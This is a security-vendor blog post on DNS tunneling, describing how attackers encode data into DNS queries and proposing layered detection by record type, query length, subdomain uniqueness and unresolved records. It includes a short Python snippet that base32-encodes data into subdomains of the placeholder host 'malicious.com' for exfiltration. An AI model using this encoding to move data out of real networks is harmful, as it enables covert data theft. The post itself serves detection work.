Plight at the end of the tunnel

Editor’s Note: Elastic joined forces with Endgame in October 2019, and has migrated some of the Endgame blog content to elastic.co. See Elastic Security to learn more about our integrated security solutions.

DNS tunneling is a technique that misuses Domain Name System (DNS) to encode another protocol’s data into a series of DNS queries and response messages. It received a lot of attention a few years ago, when malware families like Feederbot and Morto worm were discovered using DNS tunneling as a command and control (C&C) channel.

However, as Internet architecture has evolved, many of the techniques that were developed to detect DNS tunnels now create false positives. Evolutionary changes to the Internet, which include the widespread use of Content Delivery Networks and unconventional applications of DNS such as reputation/blocklist lookups and telemetry, has made it harder to detect DNS tunnels. Because of the challenges, and given their ongoing popularity as an attack vector for data theft, I revisited this topic and recently presented some of the results of my research at BSides Charm. In this blogpost, I’ll walk through the basics of DNS tunneling, some challenges with detection, and offer recommendations for detecting these attacks while limiting false positives.

Back to basics

DNS is mainly known for mapping domain names to IP addresses. This is achieved using A and AAAA records for IPv4 and IPv6 records respectively. In addition to these records, DNS also provides a range of other record types for a wide variety of applications. For example, CNAME records are used to create aliases for a domain name, MX records are used to discover Mail exchange, and TXT records are used to exchange arbitrary data associated with the domain.

endgame-plight-tunnel-upstream-data-blog.png

Upstream data in DNS query field and downstream data in DNS response RR fields

Since DNS is such a fundamental protocol, outbound DNS access is enabled in even very restrictive environments. DNS tunneling abuses this ubiquity of DNS to create covert channels for C&C or data exfiltration. DNS tunnels work by sending upstream data in a DNS query field, and receive downstream data in DNS response RR fields.

A domain name is limited to 255 characters from the character set [a-z0-9-]. In order to send binary data upstream via this field, the data must be encoded to meet this character set requirement. The following code illustrates how upstream data may be encoded.

data = base32(binary_data) 
csize = 255 – len(‘.malicious.com’) 
for chunk in (data[i:i+csize] for i in range(0, len(data), csize)):   
 labels = [chunk[j:j+63] for j in range(0, len(chunk), 63)] 
 fqdn = ‘.’.join(labels) + “.malicious.com” 
socket.gethostbyname(fqdn)

The downstream data is sent using various resource records (RR). Each RR format has a size and character set limitation. PRIVATE and TXT records allow 216 [a-zA-Z0-9-+] characters. CNAME, MX and SRV records have the same format as a DNS query. The size and character-set restrictions of each RR record put a limitation on the amount of data and the encoding function that can be used. The adversary’s decision to use one RR type over the other in a covert channel comes down to stealth versus bandwidth as data transfer requirements are balanced with the desire to remain undetected.

DNS tunneling has some properties that set it apart from other tunneling techniques like ICMP tunneling:

  1. DNS is ubiquitous. It is enabled even in the most restrictive networks. Airline and hotel WiFi DHCP and DNS are two protocols that are usually enabled before all the traffic is restricted behind a paywall.
  2. DNS tunneling is relatively performant. As far as covert tunneling protocols go, DNS tunneling performs well in terms of latency and bandwidth.
  3. It doesn’t require a direct connection between the attacker and the victim. The DNS traffic is usually relayed through a recursive resolver that performs queries iteratively on behalf of the client. Netflow collected on the host will not reveal a direct connection to the attacker.
  4. Upstream only channels can be very stealthy. If an attacker is only interested in an upstream channel, for example data exfiltration, DNS tunneling doesn’t have to use the DNS responses. It may allow all of the DNS queries to fail with NXDOMAIN or a FORMAT_ERR, and go under the radar of DNS monitoring applications.
  5. Built-in load balancing. Lastly, DNS tunnels don’t have to use a single domain name to exchange traffic. It can be spread over multiple domains sharing the same nameserver. This provides additional stealth and resilience, since no single domain would stand out as on outlier in the network traffic baselines.

The False Positive Challenge

DNS tunnels encode binary data into an ASCII format, which is then transferred as a domain name in a DNS query. Such domain names, generated from encoded binary data, have high entropy. Moreover, in order to achieve high bandwidth, DNS tunnels encode the largest possible chunk of binary data in each packet, yielding large DNS packets. So, given a stream of DNS traffic from a DNS tunnel, one would observe a large number of long subdomains under the registered domain, each with high entropy.

In contrast, web traffic is usually comprised of domain names that are short, easy to remember, and derived from a spoken language. Therefore, normal DNS traffic is expected to have smaller DNS packets containing domain names with low entropy.

High entropy, a large number of subdomains, and large packet size may seem like reliable indicators of a DNS tunnel. But that approach now yields an unmanageable volume of false positives.

One of the primary reasons for this is the advent of CDNs (Content Delivery Networks). Consider a domain that is hosted on a large CDN. The content delivery mechanism usually works by creating a CNAME record (i.e. alias), for each hosted customer domain to a unique, often random-looking subdomain of a CDN domain. The DNS resolution of this CNAME is how the content delivery optimization is actually delivered.

endgame-plight-tunnel-dns-baltimore-sun-blog.png

DNS resolution of www.baltimoresun.com

It is easy to see the parallels of this property to a DNS tunnel - a large number of subdomains, each with high entropy.

This large number of subdomains may not be limited to a small set of CDN domains. Some services create a large number of sub-domains directly under the customer’s primary registered domain.

endgame-plight-tunnel-dns-toms-hardware-blog.png

One of the many DNS queries generated from browsing www.tomshardware.com

In addition, some services utilize DNS for non-conventional use cases like file/domain reputation lookups, telemetry etc. Spamhaus provides a DNSBL service to lookup reputation of domains. Team Cymru provides an extensive ASN & BGP peer lookup service over DNS. DNS traffic to these services also yield false positives.

In the past, SOCs have gotten away with reactive whitelisting. But as more and more such services come online, a whitelisting approach just doesn’t scale.

Layered Approach to Detecting DNS Tunnels

Given these challenges, we need a layered approach to sift through DNS traffic, with each layer attacking a particular aspect of a DNS tunnel. These layers consist of record types and sizes and access patterns.

RECORD TYPES AND RECORD SIZES

Resource Record types

NULL and Private RR types have very limited valid use cases. These RRs in DNS traffic should raise an alarm. TXT records have some valid domain specific use cases. But in spite of that, the number and size of TXT RRs per domain can be used to detect the simplest of DNS tunnels.

Question and RR size

DNS packet size alone is no longer a good indicator of DNS tunnels. Many domains provide a large number of records for redundancy and load balancing. In addition, AAAA resource records are large and can skew the baseline. If we dig deeper into the DNS packet, query length and individual RR size can be a good feature used for detection.

In particular, subdomains greater than 180 characters and two or more labels greater than 52 characters should be considered highly suspicious. These thresholds are evident from the following two graphs plotting maximum query length on the x-axis and the frequency of observing that value expressed on a log scale on the y-axis. Benign domains are plotted in blue and malicious DNS tunnels are plotted in the red.

endgame-plight-tunnel-max-query-len-blog.png

Maximum query length on the x-axis, frequency in log scale on the y-axis

Similarly, the size of individual RRs in each response can be a good indicator of the existence of a DNS tunnel. Consider the following two graphs plotting the maximum RR length on the x-axis and the frequency of observing that value expressed on a log scale on the y-axis. Benign domains are plotted in blue and DNS tunnel domains are plotted in red.

endgame-plight-tunnel-max-record-len-blog.png

Maximum Resource Record length on the x-axis, frequency in log scale on the y-axis

Outliers in the subdomain’s length, number of labels in the subdomain, and maximum resource record length together help narrow down the field to a small set of potential candidates of a DNS tunnel.

ACCESS PATTERNS

Unique subdomains

As mentioned earlier, the number of subdomains per domain doesn’t always indicate a DNS tunnel. You’ll find that CDNs domain names (e.g., akamaiedge[.]com) or domains that host its user content on subdomains (e.g., blogspot.com) also create a large number of subdomains. What separates a DNS tunnel domain from other domains that have a large number of subdomains is repeat queries. In particular, subdomains created by DNS tunnels are usually only queried once. Therefore, the ratio of the number of unique subdomains to the number of queries per domain works as a much better indicator of a DNS tunnel.

Loose ends

Lastly, DNS tunnels leave some loose ends. To understand that, let’s consider the response from dig www[.]amazon[.]com :

endgame-plight-tunnel-dns-res-amazon-blog.png

DNS resolution of www.amazon.com

A CNAME record sets another domain as an alias of the queried domain. The new CNAME FQDN may in turn be an alias of a third domain. But, eventually, the alias domain resolves to an IP address, either with a A/AAAA record inserted proactively, or via an explicit query. The DNS query is usually a precursor to an IP connected to the resolved FQDN. The same is true for MX or SRV records. DNS tunnels, on the other hand, don’t have that requirement. There is no intention to ever make an IP connection to the resolved domain name. If we track all RR for a domain and find out that it leaves a large number of those new RR unresolved to an IP address, it is a strong indicator of a potential DNS tunnel.

Conclusion

Ubiquity of DNS makes it easy for an attacker to create DNS tunnels and go undetected under the large volume of DNS logs that an enterprise usually generates. But it isn’t particularly hard to employ the aforementioned techniques to detect DNS tunnels. While DNS tunnels may successfully hide the data in the protocol fields, it is much harder to feign the behavior and access patterns of a benign use of DNS.

Now that we can detect DNS tunnels reliably, it is important to provide a final word on DNS privacy and its applications on DNS tunneling. There has been a lot of interest lately in providing DNS privacy to consumers. There are two protocols that continue to garner support and widespread deployment - DOH (DNS over HTTPS) and DNS over TLS. These protocols provide confidentiality to DNS lookups to thwart passive introspection. In the future, DNS tunnels may also utilize these protocols to evade detection. In turn, our detection mechanisms will evolve by relying more on the access patterns and high order behaviors, than on packet introspection.